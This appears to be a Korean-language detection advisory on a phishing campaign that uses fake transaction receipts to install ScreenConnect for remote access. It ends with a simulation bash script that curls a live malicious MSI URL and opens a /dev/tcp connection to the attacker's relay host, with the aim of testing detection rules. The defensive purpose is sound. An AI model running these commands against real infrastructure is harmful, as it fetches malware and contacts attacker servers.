멀웨어 피싱/사기: 거래 영수증으로 위장한 피싱 이메일
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
위협 행위자들이 미국 기업 직원을 사칭해 거래 영수증으로 위장된 첨부 파일이 포함된 피싱 이메일을 보내고 있습니다. 이 공격은 악성 PDF를 사용해 사용자를 유도하여 실제로는 VBScript를 실행하는 Adobe Flash Player 업데이트를 다운로드하게 합니다. 이 스크립트는 이후 지속적인 원격 액세스를 위해 합법적인 ScreenConnect 원격 관리 도구를 설치합니다.
조사
AhnLab 보안 정보 센터(ASEC)는 피싱 이메일의 내용과 첨부된 PDF의 동작을 조사하여 해당 캠페인을 식별했습니다. 조사 과정에서 악성 VBScript의 실행 체인에서부터 백그라운드 페이로드 회수 및 조용한 MSI 패키지 설치에 이르기까지 추적하였습니다. curl.exe and msiexec.exe.
완화
사용자는 예기치 않은 거래 영수증 및 Adobe Flash Player와 같은 소프트웨어 업데이트 설치 메시지를 인식하도록 훈련받아야 합니다. 조직은 VBScript 실행을 제한하고 ScreenConnect를 포함한 원격 관리 도구의 무단 사용을 모니터링해야 합니다. 애플리케이션 허용 목록을 설정하여 알 수 없거나 승인되지 않은 MSI 패키지의 실행을 방지할 수 있습니다.
대응
악성 활동이 감지되면, ScreenConnect를 통한 원격 접근을 방지하기 위해 피해 시스템을 즉시 격리해야 합니다. 응답자는 relay.Gamedbd.Com 인프라와 연결된 활성 세션을 종료하고 레지스트리를 검사해 저장된 세션 정보를 확인해야 합니다. 전체 포렌식 조사를 통해 원격 관리 도구를 통한 횡적 이동 또는 데이터 유출이 발생했는지 확인해야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
LOLBAS WScript / CScript (프로세스 생성 경로)
대안 원격 액세스/관리 소프트웨어 (프로세스 생성 경로)
제3자 서비스/도구를 통한 데이터 침투/유출/C2 가능 (프록시 경로)
제3자 서비스/도구를 통한 데이터 침투/유출/C2 가능 (DNS 경로)
탐지를 위한 IOCs (HashMd5): 악성 피싱/사기: 거래 영수증으로 위장된 피싱 이메일
거래 영수증으로 위장된 피싱 이메일 탐지 [프록시]
거래 영수증을 사칭한 피싱 이메일이 MSI 패키지 설치로 이어짐 [Windows 프로세스 생성]
시뮬레이션 실행
전제 조건: 텔레메트리 & 베이스라인 사전 점검이 통과되어야 합니다.
근거: 이 섹션은 탐지 규칙을 유발하기 위한 공격자의 기술(TTP)의 정확한 실행을 설명합니다. 커맨드와 내러티브는 식별된 TTP를 직접 반영해야 하며 탐지 로직이 기대하는 정확한 텔레메트리를 생성해야 합니다. 추상적이거나 관련 없는 예시는 오진을 유발할 것입니다.
-
공격 내러티브 및 커맨드: 공격자는 실패한 거래에 관한 이메일을 발송하여 피싱 캠페인을 시작합니다. 링크는 피해자를
https://transaction-sucessful.vercel.app로 유도하여 가짜 영수증을 제공합니다. 피해자가 “영수증 다운로드”를 클릭하면 브라우저는https://payment-six-eta.vercel.app/doc/sc.msi를 가져오려고 합니다. 페이로드가 실행되면 ScreenConnect 릴레이에relay.gamedbd.com:8041연결하여 원격 액세스 세션을 수립하려고 시도합니다. 이 시퀀스는 URL 기반 탐지 및 도메인/포트 기반 탐지 로직을 테스트합니다. -
회귀 테스트 스크립트:
#!/bin/bash # 피싱/ScreenConnect 탐지 규칙을 유발하기 위한 시뮬레이션 스크립트 echo "[+] 시뮬레이션 시작: 피싱/ScreenConnect 탐지 테스트" # 1. 악성 MSI를 Vercel URL에서 다운로드하는 시뮬레이션 echo "[+] 단계 1: 악성 Vercel URL에 대한 연결 시뮬레이션 중..." curl -s -o /dev/null "https://payment-six-eta.vercel.app/doc/sc.msi" # 2. 특정 ScreenConnect 릴레이 도메인/포트에 대한 연결 시뮬레이션 echo "[+] 단계 2: 악성 ScreenConnect 릴레이에 대한 연결 시뮬레이션 중..." # 실제 리스너가 필요 없이 연결 시도를 시뮬레이트하기 위해 /dev/tcp를 사용합니다. timeout 2 bash -c 'cat /dev/tcp/relay.gamedbd.com/8041' 2>/dev/null echo "[+] 시뮬레이션 완료. SIEM에서 경고를 확인하세요." -
정리 커맨드:
# 이 네트워크 기반 시뮬레이션으로 인해 생성된 지속적인 아티팩트는 없습니다. # 로컬 파일이 다운로드된 경우 제거해야 합니다: rm -f sc.msi echo "[+] 정리 완료."